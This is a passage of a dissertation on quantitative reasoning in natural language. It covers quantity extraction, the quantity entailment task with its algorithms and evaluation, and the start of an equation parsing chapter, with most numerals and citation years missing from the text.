a detailed discussion of these systems can be found in [mukherjee and garain, ], and indeed a lot of the examples were taken from that survey. all the systems described above have different restrictions on the types of problems they handle. also, they do not perform evaluation on any benchmark datasets; some of the systems are also not publicly available. as a result, it is impossible to compare these systems.

. solvers for other domains

there were several systems developed also for related fields like geometry, physics, chemistry and calculus problems. since they are less relevant for this dissertation, we only give a brief overview of these systems.

• the program carps, i.e.
calculus rate problem solver [charniak, ] written by eugene charniak reads, solves calculus rate problems stated in english. • the system of happiness was developed by [gelb, ] to solve simple probability questions. • the newton program written by [de kleer, ] is an expert problem solver in the domain of mechanics, specifically, relating to kinematics of objects moving on surface. • the program mecho developed in prolog by [bundy et al., ] solves mechanics problems stated in english in the areas of pulley problems, statics problems, motion on smooth complex paths and motion under constant acceleration. • isaac program written by [novak, ] can read, understand, solve and draw pictures of physics problems stated in english. • albert developed by [oberem, ] is an intelligent tutoring (cai) system that not only under- stands and solves physics (more specifically kinematics) problems but can also teach a student how to solve them. . recent advances in statistical solvers all the methods discussed earlier in this chapter use some form of rule based systems to arrive at the output equation or answer. however, hand-engineered rules have an obvious drawback – they do not provide robustness to the variability of input text. indeed, most of the early systems constrained their input to be of a few specific forms, which allowed them to develop transformation rules for problem solving. recently, there has been a renewed interest in solving quantitative reasoning problems. it started in with the template based system of nate kushman [kushman et al., ], which focused on solving algebra word problems. this was followed by the aries system of allen institute for artificial intelligence (ai ), which focused on solving addition subtraction problems. all recent methods (including the work done in this thesis) use some form of machine learning to achieve robustness, something which earlier systems lacked. however, it should be noted that some of the challenges that were identified and ideas introduced by the early works are still relevant for building robust statistical methods. many of these ideas are used alongside statistical methods in this thesis. chapter quantity entailment . introduction in this chapter, we investigate the problem of reasoning with respect to quantities using only the local context. consider the textual inference in example . , which we present as a textual entailment query [dagan et al., ]. example . t:a bomb in a hebrew university cafeteria killed five americans and four israelis. h:a bombing at hebrew university in jerusalem killed nine people, including five americans. to determine whether h is implied or entailed by t, we need to identify the quantities and the units from “five americans” and “four israelis”, as well as use the fact that “americans” and “israelis” are “people”. all these inferences can be made by processing local context of the quantities. in this chapter, we describe some key steps necessary to facilitate reasoning about quantities with local context. we first describe a system developed to recognize quantities in free form text, infer units associated with them and convert them to a standardized form. for example, in example . about six and a half hours later , mr. armstrong opened the landing craft’s hatch. we would like to extract the number . , the corresponding unit, “hour”, and also determine that the quantity describes an approximate figure, not an exact one. 
one of the difficulties is that any noun or noun phrase can be a unit, and inferring them requires analyzing contextual cues and local sentence structure. as we show, in some cases deeper nlp techniques are required to support that.

we then develop a reasoning framework for quantities that we believe can play an important role in general purpose textual inference. as an evaluation metric for local context based reasoning, we isolate the quantity reasoning component of the rte task, and formulate quantity entailment (qe) – the task of determining whether a given quantity can be inferred from a given text snippet. we then describe our approach towards solving it.

as an additional evaluation, we also show the effectiveness of our system on an application of qe, a search for ranges of currency values. given a query range, say from  million usd to  million usd, we want to find all mentions of money with values in this range. using standard search engine technology to query all values in the range, in the various forms they could be expressed, is not feasible. instead, we use our proposed approach to extract monetary mentions from text and normalize them, and then we use qe to verify them against the query.

we develop and annotate datasets for evaluation, and show that our approach can handle the aforementioned reasoning tasks quite well. (the datasets are available for download at http://cogcomp.cs.illinois.edu/page/resource_view/ ; the related software is available at http://cogcomp.cs.illinois.edu/page/software_view/quantifier.) the next section presents some related work on quantities and reasoning. we then formally define a quantity and describe our knowledge representation. the following sections describe quantity extraction and standardization. we next present the formulation of quantity entailment, and describe our reasoning framework for it.

. related work

quantities in textual entailment. quantities have been recognized as an important part of a textual entailment system [de marneffe et al., , maccartney and manning, , sammons et al., ], and [de marneffe et al., ] claims that discrepancies in numbers are a common source of contradictions in natural language text. the authors describe a corpus of real-life contradictory pairs from multiple sources such as wikipedia and google news, in which they found that % of the contradictions were due to numeric discrepancies. in addition, they analyzed several textual entailment datasets [dagan et al., ] and found that numeric contradictions constitute . % of contradictory entailment pairs.

monotonicity in reasoning. the reasoning framework described in this chapter borrows ideas of monotonicity; reasoning about quantities often depends on reasoning about monotonicity. the role of monotonicity in nl reasoning has been described in [barwise and cooper, ]. the authors categorize noun phrases as upward or downward monotonic, and also detect constructs where monotonicity depends on context.
while these approaches do not scale to unrestricted english, they have influenced the quantity representation that we use. . representing quantities in general, quantity refers to anything which is measurable. our quantities representation is influenced by the one proposed in [forbus, ] but we propose a simpler version of their qualitative process theory: definition (quantity-value representation) in quantity-value representation (qvr), a quantity is represented as a triple (v,u,c), where constituents in the triple correspond, respectively, to: . value: a numeric value, range, or set of values which measure the aspect, e.g. more than , one or two, thousands, march , . the value can also be described via symbolic value (e.g., “below the freezing point”). we do not store surface forms explicitly, but convert them to a set or range. for example, “more than ” is stored as the range ( , +∞). details of these conversions are given in section . . . . units: a noun phrase that describes what the value is associated with. e.g., inches, minutes, bananas. the phrase “us soldiers” in the phrase “five us soldiers” is a unit. . change: specifies how the parameter is changing, e.g., increasing. this constituent often serves as an indication of whether or not the value is relative to another. for example, “she will receive an [additional cents per hour]”, “the stock [increased percent]”, “jim has [ balls more] than tim”. . extraction of quantities in this section we describe the first component of our approach, that of identifying quantities and units in text and standardizing their representation. we use a a two step approach to extract quantities from free form text. . segmentation this step takes raw text and finds segments of contiguous text which describe quan- tities. . standardization using the phrases extracted in the previous step, we derive the qvr. an overview of our method is given in algorithm . algorithm quantityextraction( t ) input: text t output: set of quantity-value triples extracted from t : q ←∅ : s ← segmentation( t ) : for all segment s ∈ s do : q ← standardization( s ) : if unit of q not inferred then : q ← inferunitfromsemantics( q, s, t ) : end if : q ← q∪{q} : end for : return q we model the segmentation step as a sequence segmentation task because quantities often appear as segments of contiguous text. we adapt and compare two approaches that were found successful in previous sequential segmentation work in nlp: . a semi-crf model [sarawagi and cohen, ], trained using a structured perceptron algorithm [collins, ], with parameter averaging [freund and schapire, ]. . a bank of classifiers approach [punyakanok and roth, ] that we retrain with a new set of features. the same feature set was used for both approaches. despite the additional expressive power of crfs, we found that the bank of classifiers (which is followed by a simple and tractable inference step) performs better for our task, and also requires significantly less computation time. . . features for each token xi in the input sequence we extract the following features: . word class features: xi appears in a list of known scientific units (e.g., meters, fahrenheit), written numbers (e.g., two, fifteen), names of a months, day of the week, miscellaneous temporal words (e.g. today, tomorrow), currency units, etc. . character-based: xi contains a digit, is all digits, has a suffix (st,nd,rd,th). . part of speech tags: we use the illinois pos tagger [roth and zelenko, ]. . 
most of the features were generated from a window of [− , ] around the current word. additional features were generated from these by conjoining them with offset values from the current word. . . mapping text segments into qvr we develop a rule-based standardization step, that is informed, as needed, by deeper nl processing, including semantic role labeling (srl, [palmer et al., ]) and co-reference resolution. some key steps of this procedure are as follows: . convert written numbers to floating point: e.g., three thousand five hundred twenty → . . convert dates to an internal date type: e.g., march th → date( / /xxxx) . replace known names for ranges: e.g., teenage → [ , ] years-old. . convert all scientific units to a standard base unit: e.g., mile → . meters. . replace non-scientific units with wordnet synsets . rewrite known units to a standard unit: e.g., usd, us$, dollars → us$. . standardize changing quantity: e.g., “additional books” → + [book]. . extract bounds: we use a list of phrases, such as “more than”, “less than”, “roughly”, “nearly”. by default, if a bound keyword is not present we assume the bound is “=”. . modify value using bounds : we convert values which have a bound to a range of values. scalar implicature is taken into consideration here. consider the sentence “john bought books.”, although it can be interpreted that buying books is a corollary of buying , in this case, we make the assumption that books were not purchased. see section . . for a discussion on the subject. we use the following rules, where v is the value extracted before using bound information. • ≤ v → (−∞,v], similarly for ≥,<,>. • = v →{v} • ≈ v → [v − c.v,v + c.v], we use c = . . . . extraction of units in most cases, the units related to the numeric values appear adjacent to them. for example, in the sentence “there are two books on the table”, the unit “book” follows “two”. the sequence segmentation groups these words together, from which it is easy to extract the unit. however, in some cases, a better understanding of the text is needed to infer the units. consider the following example: example . a report from unaids, the joint united nations program on hiv/aids, released on tuesday, shows the number of adults and children with hiv/aids reached . million in . here, we need to know that “ . million” refers to “the number of adults and children with hiv/aids”. also, in: example . the number of member nations was in , and then it increased to . we need to know that the pronoun “it” refers to “the number of member nations”. we employ a sequential process in our standardization. in case the first step described above fails to extract units, we make use of deeper processing of the sentence to accomplish that (see an evaluation of the contribution of this in the experimental section). these steps are denoted by the function inferunitfrom- semantics() in algorithm . we apply coreference resolution to identify pronoun referents and then apply a semantic role labeler, to recognize which terms are associated with the quantity, and can be potential units. in the case of example . , the srl tells us that for the verb “reached”, the associated subject is “the number of adults and children with hiv/aids” and the object is the mention “ . million”. hence, we conclude that the subject can be a candidate for the unit of “ . million”. for the purpose of entailment, we keep the entire set of possible word chunks, which are linked by the srl to our quantity mention, as candidate units. 
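the following is a minimal, self-contained sketch that ties together the standardization steps just described: detecting a bound keyword, converting the value to a range, and rewriting a few known unit tokens. the keyword lists, the regular expression, and the tolerance constant for "approximately" are assumptions made for the illustration, not the rules used by the actual system.

```python
# illustrative sketch of mapping a segmented quantity phrase to a
# quantity-value triple (value range, unit, change); only bound handling and
# a few unit rewrites are shown, with assumed word lists and constants.
import re
from typing import Optional, Tuple

APPROX_C = 0.1                                   # assumed tolerance for "roughly"/"around"
BOUNDS = {"more than": ">", "less than": "<", "at least": ">=",
          "at most": "<=", "roughly": "~", "nearly": "~", "around": "~"}
UNIT_REWRITES = {"usd": "US$", "us$": "US$", "dollars": "US$", "$": "US$"}

Range = Tuple[float, float]


def value_to_range(bound: str, v: float) -> Range:
    """apply the bound rules: '> v' -> (v, +inf), '~ v' -> [v - c*v, v + c*v], etc."""
    if bound in (">", ">="):
        return (v, float("inf"))      # open/closed distinction kept simple here
    if bound in ("<", "<="):
        return (float("-inf"), v)
    if bound == "~":
        return (v - APPROX_C * v, v + APPROX_C * v)
    return (v, v)                     # default bound "="


def standardize(segment: str) -> Optional[Tuple[Range, str, bool]]:
    """very small sketch: detect bound keyword, number, unit token, change marker."""
    text = segment.lower()
    bound = next((b for kw, b in BOUNDS.items() if kw in text), "=")
    change = "additional" in text
    m = re.search(r"(\d+(?:\.\d+)?)", text)
    if not m:
        return None
    value = float(m.group(1))
    rest = text[m.end():].strip()
    unit_token = rest.split()[0] if rest else ""
    unit = UNIT_REWRITES.get(unit_token, unit_token)
    return value_to_range(bound, value), unit, change


if __name__ == "__main__":
    print(standardize("more than 10 dollars"))   # ((10.0, inf), 'US$', False)
    print(standardize("roughly 6.5 hours"))      # ((5.85, 7.15), 'hours', False)
```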
since most units are found in positions adjacent to the numeric mention, we optimize on runtime by ap- plying the srl and coreference resolver only when the segmented chunk does not have adequate information to infer the unit. we use the illinois coreference resolver ([bengtson and roth, ], [kai-wei chang and roth, ]) and the illinois srl [punyakanok et al., ], for coreference and seman- tic role labelling, respectively. . quantity entailment in this section we describe our approach to quantitative reasoning using local context of quantities. we first formulate the task of quantity entailment, and then describe our reasoning framework. definition (quantity entailment) given a text passage t and a quantity-value triple h(ch,vh,uh), quantity entailment is a -way decision problem: . entails: there exists a quantity in t which entails h. . contradicts: no quantity in t entails h, but there is a quantity in t which contradicts h. . no relation: there exists no quantity in t, which is comparable with h. since the decision is about a single quantity-value triple, we believe this will test the capability to capture local contextual cues of the quantity. this task can also be seen as a building block for a general textual entailment system. the need to identify sub-problems of textual inference, in the context of the rte task, has been motivated by [sammons et al., ]. quantity entailment can be considered as one such step. since we envision that our qe module will be one module in an rte system, we expect that the rte system will provide it with some control information. for example, it is often important to know whether the quantity is mentioned in an upward or downward monotonic context. since we are evaluating our qe approach in isolation, we will always assume upward monotonicity, which is a lot more common. monotonicity has been modeled with some success in entailment systems [maccartney and manning, ], thus providing a clear and intuitive framework for incorporating an inference resource like the quantity entailment module into a full textual entailment system. . . reasoning framework our quantity entailment process has two phases: extraction and reasoning. in the extraction phase, we take a text passage t and extract quantity-value triples (value, units, change) from it. in the reasoning phase, we apply a lightweight logical inference procedure to the triples extracted from t to check if h can be derived. there are two types of rules applied in the reasoning phase: implicit quantity productions and quantity comparisons. the combination of these rules provides good coverage for the qe task. quantity comparison quantity comparison compares a quantity t : (vt,ut,ct) extracted from t and the quantity h : (vh,uh,ch) and decides whether h can be derived via some truth preserving transformation of t. there are three possibilities: (t entails h), (t contradicts h), or (t has no relation with h). the overview is given in alg. , which is designed under our assumption that entailing quantities should respect upward monotonicity. this requires monotonicity verification of both units and values. in order for a quantity to contradict or entail another, their units must be comparable. determining the comparability of scientific units is direct since they form a closed set. comparing non-scientific units is more involved. 
the inference rule used here is as follows: if the syntactic heads of the unit phrases match (i.e., there is an is-a or synonymy relation in either direction), then the phrases are comparable. these comparisons are encoded as a function comparableunits(ut, uh), which returns true if the units ut and uh are comparable, or else returns false. if the units are comparable, the direction of monotonicity (i.e., the direction of the is-a relation between the heads and the effects of any relevant modifiers) is verified. the function checkmonotonicityofu- nits(ut, uh) returns true, if ut is more specific than uh, false otherwise. to compute the is-a and synonymy relations we use wordnet [miller et al., ], an ontology of words which contains these relations. we also augment wordnet with two lists from wikipedia (specifically, lists of nationalities and jobs). next, we check whether the values of the quantities compared obey the monotonicity assumption; we say that vt is more specific than vh if vt is a subset of vh. (note that vt and vh are both represented as sets and hence, checking subset relation is straightforward.) for example, “more than ” ⊆ “at least ”. this rule also applies to dates, e.g. “ / / ” ⊆ “march ”. respecting scalar implicature, we assume that “ ” is subset of “less than ”, but not “ ”. similar to the case of units, we use the function checkmonotonicityofvalues(vt, vh) which returns true, if vt is more specific than vh, and false otherwise. a quantity which represents some form of change of a quantity cannot be derived from a quantity which does not represent change and vice versa. we set ct = true if t denotes change in a quantity, otherwise we set ct = false. algorithm quantitycomparison( t, h ) input: quantity-value triples t(vt,ut,ct) and h(vh,uh,ch) output: returns whether t entails, contradicts or has no relation with h : if ct = ch then : return no relation : end if : if comparableunits( ut, uh )= false then : return no relation : end if : if checkmonotonicityofunits( ut, uh )= true then : if checkmonotonicityofvalues( vt, vh )= true then : return entails : end if : end if : return contradicts implicit quantity production rules there are many relationships among quantities which can be the source of implicit information. the following is an incomplete, but relatively broad coverage list of common patterns: . range may imply duration, e.g., “john lived in miami from to ” implies that john lived in miami for a duration of years. . compatible terms may be combined and abstracted. the sentence “i bought bananas, oranges, and apple” implies that fruits were purchased. . ratios can imply percentages. the sentence “ out of the dentists interviewed recommend brushing your teeth” implies that % of the dentists interviewed recommend brushing. . composition: quantities and units may sometimes be composed. consider the following examples, the phrase “six korean couples” means that there are people; the phrase “john gave six -minute speeches” implies that john spoke for minutes. the rules used for producing implicit quantities employed in our system are the following: • (a ratio b) if a is a percentage, then multiply its value with the value of b to obtain a new quantity with the units of b. • (a ratio b) if a is not percentage, divide its value with the value of b to obtain a new quantity with the units of b. • (a range b) take the difference of the two values to obtain a new quantity with the appropriate change of units, e.g., time-stamp minus time-stamp results in units of time. 
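the comparison just described can be summarized with the following python sketch of quantitycomparison. the unit comparability and monotonicity checks are stubbed with a toy is-a table; the actual system consults wordnet and the wikipedia-derived lists mentioned above.

```python
# Sketch of the quantity-comparison step. Unit comparability and monotonicity
# are stubbed with a toy is-a relation; the real system uses WordNet plus
# Wikipedia-derived lists of nationalities and jobs.

ENTAILS, CONTRADICTS, NO_RELATION = "entails", "contradicts", "no relation"

# toy is-a relation: child head -> parent head (assumption, for illustration only)
ISA = {"american": "person", "israeli": "person", "dollar": "currency"}


def is_more_specific_head(h1: str, h2: str) -> bool:
    """True if head h1 equals h2 or is an is-a descendant of h2."""
    while h1 is not None:
        if h1 == h2:
            return True
        h1 = ISA.get(h1)
    return False


def comparable_units(ut: str, uh: str) -> bool:
    return is_more_specific_head(ut, uh) or is_more_specific_head(uh, ut)


def check_monotonicity_of_units(ut: str, uh: str) -> bool:
    # ut must be at least as specific as uh (upward monotone direction)
    return is_more_specific_head(ut, uh)


def check_monotonicity_of_values(vt: tuple, vh: tuple) -> bool:
    # values are represented here as closed ranges; vt must be a subset of vh
    return vh[0] <= vt[0] and vt[1] <= vh[1]


def quantity_comparison(t, h) -> str:
    """t and h are triples (value_range, unit_head, is_change)."""
    vt, ut, ct = t
    vh, uh, ch = h
    if ct != ch:                       # change vs. non-change quantities never interact
        return NO_RELATION
    if not comparable_units(ut, uh):
        return NO_RELATION
    if check_monotonicity_of_units(ut, uh) and check_monotonicity_of_values(vt, vh):
        return ENTAILS
    return CONTRADICTS


if __name__ == "__main__":
    t = ((5, 5), "american", False)    # "five americans"
    h = ((9, 9), "person", False)      # "nine people"
    # contradicts: the units are comparable but {5} is not a subset of {9}
    print(quantity_comparison(t, h))
```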
algorithm quantityentailment( t, h ) input: text t and a quantity-value triples h(vh,uh,ch) output: returns whether t entails, contradicts or has no relation with h : q ← quantityextraction( t ) : q′ ← generateimplicitquantities( q ) : q ← q∪q′ : contradict ← false : for all quantity-value triple q ∈ q do : if quantitycomparison( q, h )= entails then : return entails : end if : if quantitycomparison( q, h )= contradicts then : contradict← true : end if : end for : if contradict= true then : return contradicts : else : return no relation : end if lightweight logical inference the qe inference procedure simply applies each of the implicit quantity production rules to the quantity- value triples extracted from the passage t, until no more quantities are produced. then it compares each quantity t extracted from t with the quantity h, according to the quantity comparison rules described in algorithm . if any quantity in t entails h, then “entails” is reported; if there is no quantity in t which can explain h, but there exists one which contradicts h, then “contradiction” is reported; otherwise “no relation” is reported. the complete approach to quantity entailment is given in algorithm . . . scope of qe inference our current qe procedure is limited in several ways. in all cases, we attribute these limitations to subtle and deeper language understanding, which we delegate to the application module that will use our qe procedure as a subroutine. consider the following examples: t : adam has exactly dollars in the bank. h : adam has dollars in the bank. h : adam’s bank balance is dollars. here, t implies h but not h . however for both h and h , qe will infer that “ dollars” is a contradiction to sentence t, since it cannot make the subtle distinction required here. t : ten students passed the exam, but six students failed it. h : at least eight students failed the exam. here again, qe will only output that t implies “at least eight students”, despite the second part of t. qe reasons about the quantities, and there needs to be an application specific module that understands which quantity is related to the predicate “failed”. there also exists limitations regarding inferences with respect to events that could occur over a period of time. in “it was raining from pm to pm” one needs to infer that “it was raining at pm” although “ pm” is more specific than “ pm to pm”. there is a need to understand the role of associated verbs and entities, and the monotonicity of the passages to infer the global entailment decision. many of these challenges will be handled in the later chapters of the thesis. . experimental study in this section, we seek to validate our proposed modeling. we evaluate our system’s performance on four tasks: quantity segmentation, quantity entailment and currency range search. we do not directly evaluate our system’s ability to map raw text segments into our representation, but instead evaluate this capability extrinsically, in the context of the aforementioned tasks, since good standardization is necessary to perform quantitative inference. . . datasets qe: due to lack of related work, an adequately annotated corpus does not exist. thus, in order to evaluate our system, we used two collections: . sub-corpus of the rte datasets we choose text-hypothesis pairs from rte –rte datasets, which have quantity mentions in the hypothesis. overall, we selected text-hypothesis pairs with quantities in the hypothesis. . 
newswire text sentences of newswire text were selected, all containing quantity mentions. both these datasets were manually annotated with the phrase boundaries of quantity mentions and had an inter-annotator agreement of . . we restricted annotation to contiguous segments of text. no instances of implicit quantities were annotated. we also did not annotate these mentions with qvrs. limiting the annotations to contiguous spans of text results in a few instances of quantities which contain missing information, such as missing or ambiguous units, and several range and ratio relationships which were not annotated (e.g., we do not annotate the range expressed in “from [ million] in [ ] to [ million] in [ ]”, but do so in “[from million to million]”). in the rte sub-corpus we also annotated entailment pairs with information about which quantities entail, in addition to the boundary information. for each quantity in the hypothesis we labeled it as either “entails”, “no relation”, or “contradicts”, with an inter-annotator agreement of . . there were entailing quantities, contradicting quantities and quantities which were unrelated to the corresponding text. we also maintained the information about general entailment, that is, whether the hypothesis can be explained by the text. an example of an annotated rte example is shown below. annotation example for rte sub-corpus t:a bomb in a hebrew university cafeteria killed [five americans] and [four israelis]. h:a bombing at hebrew university in jerusalem killed [nine people], including [five americans]. “nine people” : entails “five americans” : entails global entailment decision : entails although we limit our scope to infer the entailment decision for individual quantities mentioned in hypothesis, we hope to see future approaches use these individual decisions and combine them appropriately to obtain the global entailment decision. currency search we developed a new dataset for evaluating currency search. queries of various amounts of money like “ $”, “usd million”, etc. were made on a search engine, and paragraphs containing monetary mentions were taken from the top search results. we collected paragraphs containing various mentions of monetary values, and labeled them with the amount mentioned in them. we restricted the denominations to us dollars. the inter-annotator agreement was . . . . quantity segmentation we evaluate the phrase boundary recognizer on the annotated rte and newswire datasets described in the previous section, using the phrase-based f score. we compare the accuracy and running times of the semi-crf model (sc) [sarawagi and cohen, ] and the bank of classifiers model (c+i) (pr) [punyakanok and roth, ], using -fold cross-validation. note that the standardizer can often recover from mistakes made at the segmentation level. therefore, this performance does not necessarily upper bound the performance of the next step in our pipeline. the segmentation we are aiming for does not directly follow from syntactic structure of a sentence. for example, in the sentence “ the unemployment rate increased %”, we would like to segment together “increased %”, since this tells us that the quantity denotes a rise in value. also, in the sentence “apple restores push email in germany, nearly two years after motorola shut it down” we would like to segment together ”nearly two years after” . we consider a quantity to be correctly detected only when we have the exact phrase that we want, otherwise we consider the segment to be undetected. 
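the sketch below illustrates the exact-match, phrase-based f1 used for this evaluation; it is a standard formulation of the metric, not code taken from our implementation.

```python
# Exact-match, phrase-based F1: a predicted quantity span counts as correct
# only if it matches a gold span exactly.

def phrase_f1(gold_spans, pred_spans):
    """gold_spans, pred_spans: iterables of (sentence_id, start, end) tuples."""
    gold, pred = set(gold_spans), set(pred_spans)
    correct = len(gold & pred)
    precision = correct / len(pred) if pred else 0.0
    recall = correct / len(gold) if gold else 0.0
    f1 = (2 * precision * recall / (precision + recall)) if (precision + recall) else 0.0
    return precision, recall, f1


if __name__ == "__main__":
    gold = [(0, 3, 7), (1, 0, 4)]      # e.g., the span for "nearly two years after"
    pred = [(0, 3, 7), (1, 0, 3)]      # second span misses a token -> not counted
    print(phrase_f1(gold, pred))       # (0.5, 0.5, 0.5)
```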
model p% r% f% train test time time semi-crf (sc) . . . . . c+i (pr) . . . . . table . : -fold cross-validation results of segmentation accuracy and time required for segmentation, the columns for runtime have been normalized and expressed as ratios table . describes the segmentation accuracy, as well as the ratio between the time taken by both approaches. the bank of classifiers approach gives slightly better accuracy than the semi-crf model, and is also significantly faster. . . quantity entailment we evaluate the complete quantity entailment system, determining the overall loss due to the segmentation, as well as the contribution of the coreference resolver and srl. we show the performance of systems. . goldseg : uses gold segmentation, and does not use srl and coreference resolver. . goldseg+sem : uses gold segmentation, and also uses srl and coreference resolver to infer units. . predseg : performs segmentation, and does not use srl and coreference resolver. . predseg+sem : performs segmentation, and uses srl and coreference resolver. the baseline is an exact string matching algorithm. it answers “entails” if the quantity unit and value are present in the text, and answers “contradicts” if only the unit matches and the value does not. otherwise, it returns “no relation”. the results are shown in table . . note that exact match only supports . % of the entailment decisions. it is also evident that the deeper semantic analysis using srl and coreference improves the quantitative inference. task system p% r% f% entailment baseline . . . goldseg . . . +sem . . . predseg . . . +sem . . . contradiction baseline . . . goldseg . . . +sem . . . predseg . . . +sem . . . no relation baseline . . . goldseg . . . +sem . . . predseg . . . +sem . . . table . : results of qe; adding semantics(+sem) consistently improves performance; only . % of entailing quantities can be recovered by simple string matching . . currency range search table . shows the performance of our system in detecting currency phrases. we evaluate our system on the proportion of monetary mentions it recognized and standardized correctly from queried ranges of currency values, and report micro-averaged scores. note that range search is a direct application of qe, where the quantity is a range of values, and the text is the corpus we want to search. all instances of “entails” correspond to search hits. the baseline here is also a string matching algorithm, which searches for numbers in the text. system p% r% f% baseline . . . predseg+sem . . . table . : micro-averaged accuracy in detecting monetary mentions . . qualitative analysis the segmentation module made mistakes in detecting exact boundaries for uncommon phrases, e.g., “hun- dreds of thousands of people”, and “mid- ’s”. detection of missing units is problematic in cases like “three eggs are better than two”. the srl returns “three eggs” as a candidate unit, which needs to be pruned appropriately to obtain the correct unit. the primary limitation of the reasoning system in both tasks is the lack of an extensive knowledge base. wordnet based synsets prove to be insufficient to infer whether units are compatible. also, there are certain reasoning patterns and various implicit relations be- tween quantities which are not currently handled in the system. for example, inferring from the sentence “militants in rwanda killed an [average of , people per day] for [ days]” that “around , peo- ple were killed”. also, implication of ratios can be involved. 
for example, the sentence "[one out of participating students] will get the award" implies that there were " participating students", whereas "[ out of dentists] recommend brushing" does not imply there were dentists.

. conclusion

we studied reasoning about quantities in natural language text, with respect to local context. we have identified and defined an interesting and useful slice of the textual entailment problem, the quantity entailment task. since this problem involves inferences about individual quantities, it allows us to capture quantitative reasoning with respect to local context. our ability to support local context based quantitative reasoning builds on a method we proposed for detecting and normalizing quantities in unrestricted english text; we developed a framework to remove variability and ambiguity from unstructured text by mapping it into a representation which makes reasoning more tractable. once quantities are mapped into our representation, we can support the reasoning required by quantity entailment.

chapter equation parsing

. introduction

we now expand our focus from the local context of numbers to entire sentences. we investigate how numbers interact with the entities, verbs and other components of the sentence. in particular, we investigate how we can extract numeric relations expressed in sentences, along with the arguments for those relations. extracting numeric relations from sentences is a key requirement for natural language understanding. as an example, consider the news article statement in example . . understanding it requires identifying relevant entities and the mathematical relations expressed among them in text, and determining how to compose them. similarly, solving a math word problem with a sentence like example . requires realizing that it deals with a single number, knowing the meaning of "difference", and composing the right equation – " " needs to be subtracted from a number only after it is multiplied by .

example . emanuel's campaign contributions total three times those of his opponents put together.
example . twice a number equals less than triple the same number.
example . flying with the wind, a bird was able to make kilometers per hour.
example . the sum of two numbers is .
example . there are -dollar and -dollar notes.

as a first step towards understanding such relations, we introduce the equation parsing task: given a sentence expressing a mathematical relation, the goal is to generate an equation representing the relation, and to map the variables in the equation to their corresponding noun phrases. to keep the problem tractable, we restrict the final output equation form to have at most two (possibly coreferent) variables, and assume that each quantity mentioned in the sentence can be used at most once in the final equation (we empirically found that around % of sentences describing a relation have this property). in example . , the gold output of an equation parse should be v = ×v , with v = "emanuel's campaign contributions" and v = "those of his opponents put together". the task can be seen as a form of semantic parsing [goldwasser and roth, , kwiatkowski et al., ] where instead of mapping a sentence to a logical form, we want to map it to an equation. however, there are some key differences that make this problem very challenging in ways that differ from the "standard" semantic parsing. in equation parsing, not all the components of the sentence are mapped to the final equation.
there is a need to identify noun phrases that correspond to variables in the relations and determine that some are irrelevant and can be dropped. moreover, in difference from semantic parsing into logical forms, in equation parsing multiple phrases in the text could correspond to the same variable, and identical phrases in the text could correspond to multiple variables. we call the problem of mapping noun phrases to variables the problem of grounding variables. grounding is challenging for various reasons, key among them are that: (i) the text often does not mention “variables” explicitly, e.g., the sentence in example . describes a mathematical relation between the speed of bird and the speed of wind, without mentioning “speed” explicitly. (ii) sometimes, multiple noun phrases could refer to the same variable. for instance, in example . , both “a number” and “the same number” refer to the same variable. on the other hand, the same noun phrase might refer to multiple variables, as in example . , where the noun phrase “two numbers” refer to two variables. in addition, the task involves deciding which of the quantities identified in the sentence are relevant to the final equation generation. in example . , both “ ” and “ ” are not relevant for the final equation “v +v = ”. finally, the equation needs to be constructed from a list of relevant quantities and grounded variables. overall, the output space becomes exponential in the number of quantities mentioned in the sentence. determining the final equation that corresponds to the text is an inference step over a very large space. to address this, we define the concept of “projectivity” - a condition where the final equation can be generated by combining adjacent numbers or variables, and show that most sentences expressing mathematical relations exhibit the projectivity property. finally, we restrict our inference procedure to only search over equations which have this property. our approach builds on a pipeline of structured predictors that identify irrelevant quantities, recognize coreferent variables, and, finally, generate equations. we also leverage a high precision lexicon of math- ematical expressions and develop a greedy lexicon matching strategy to guide inference. we discuss and exemplify the advantages of this approach and, in particular, explain where the “standard” nlp pipeline fails to support equation parsing, and necessitates the new approach proposed here. another contribution of this work is the development of a new annotated data set for the task of equation parsing. we evaluate our method on this dataset and show that our method predicts the correct equation in % of the cases and that in % of the time we also ground all variables correctly. the next section presents a discussion of related work. next we formally describe the task of equation parsing. the following sections describe our equation representation and the concept of projectivity, followed by the description of our algorithm to generate the equations and variable groundings from text. we conclude with experimental results. . related work the work most related to this work is [madaan et al., ], which focuses on extracting relation triples where one of the arguments is a number. in contrast, our work deals with multiple variables and com- plex equations involving them. 
this work is also conceptually related to work on semantic parsing – map- ping natural language text to a formal meaning representation [wong and mooney, , clarke et al., , cai and yates, , kwiatkowski et al., , goldwasser and roth, ]. however, as mentioned earlier, there are some significant differences in the task definition that necessitate the development of a new ap- proach. . the equation parsing task equation parsing takes as input a sentence x describing a single mathematical equation, comprising one or two variables and other quantities mentioned in x. let n be the set of noun phrases in the sentence x. the output of the task is the mathematical equation described in x, along with a mapping of each variable in the equation to its corresponding noun phrase in n. we refer to this mapping as the “grounding” of the variable; the noun phrase represents what the variable stands for in the equation. table . gives an example of an input and output for the equation parsing of the text in example . . since an equation can be written in various forms, we use the form which most agrees with text, as our target output. so, for example . , we will choose v = ×v and not v = v ÷ . in cases where several equation forms seem to be equally likely to be the target equation, we randomly choose one of them, and keep this choice consistent across the dataset. the equation parsing task input twice a number equals less than triple the same number. output ×v = ( ×v ) − (equation) v = “a number” (grounding) table . : input and output for equation parsing . . equation parse representation twice a number equals less than triple the same number.sentence trigger list equation tree v v × = −r × figure . : a sentence with its trigger list and equation tree. −r indicates subtraction with order rl. in this section, we introduce an equation parse for a sentence. an equation parse of a sentence x is a pair (t,e), where t represents a set of triggers extracted from x, and e represents an equation tree formed with the set t as leaves. we now describe these terms in detail. trigger given a sentence x mentioning a mathematical relation, a trigger can either be a quantity trig- ger expressed in x, or variable trigger which is a noun phrase in x corresponding to a variable. a quantity trigger is a tuple (q,s), where q is the numeric value of the quantity mentioned in text, and s is the span of text from the sentence x which refers to the quantity. a variable trigger is a tuple (l,s), where l represents the label of the variable, and s represents the noun phrase representing the variable. for example, for the sentence in fig . , the spans “twice”, “ ”, and “triple” generate quantity triggers, whereas “a number” and “the same number” generate variable triggers, with label v . trigger list the trigger list t for a sentence x contains one trigger for each variable mention and each nu- meric value used in the final equation expressed by the sentence x. the trigger list might consist of multiple triggers having the same label, or extracted from the same span of text. in the example sentence in fig . , the trigger list comprises two triggers having the same label v . the final trigger list for the example in fig . is {( , “ ”), (v , “a number”), ( , “ ”), ( , “triple”), (v , “the same number”)}. note that there can be multiple valid trigger lists. in our example, we could have chosen both variable triggers to point to the same mention “a number”. 
